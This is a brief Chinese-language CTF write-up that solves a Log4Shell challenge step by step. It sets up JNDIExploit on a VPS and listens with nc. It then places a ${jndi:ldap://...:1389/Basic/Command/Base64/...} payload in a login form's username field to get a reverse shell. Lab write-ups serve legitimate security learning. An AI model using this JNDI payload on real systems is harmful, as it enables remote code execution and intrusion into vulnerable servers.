一,准备环境
有VPS即可
二,题解
1,根据提示,/bin/bash:x,带x的是无法执行的(包括base64编码),打勾的是可以执行的
2,注意
首先VPS上要装有java环境和工具,这里我用的是JNDIExploit-1.2-SNAPSHOT.jar
2.2
vps先允许反弹shell用到的端口2.3,再启动工具
2.4,再开一个窗口监听nc
2.5,构造payload,根据提示进行利用
将地址改为自己的vps地址,然后将加密后的命令放到末尾
原:${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/[base64加密后命令]}
加:${jndi:ldap://xxxxxx:1389/Basic/Command/Base64/0NSAtZSAvYmluL3No}
2.6,进行base64后将payload放到登录框的用户名处,密码随便填,提交,成功反弹shell
2.7,找到flag
2.8,!关闭监听环境和记得将vps的防火墙规则修改回去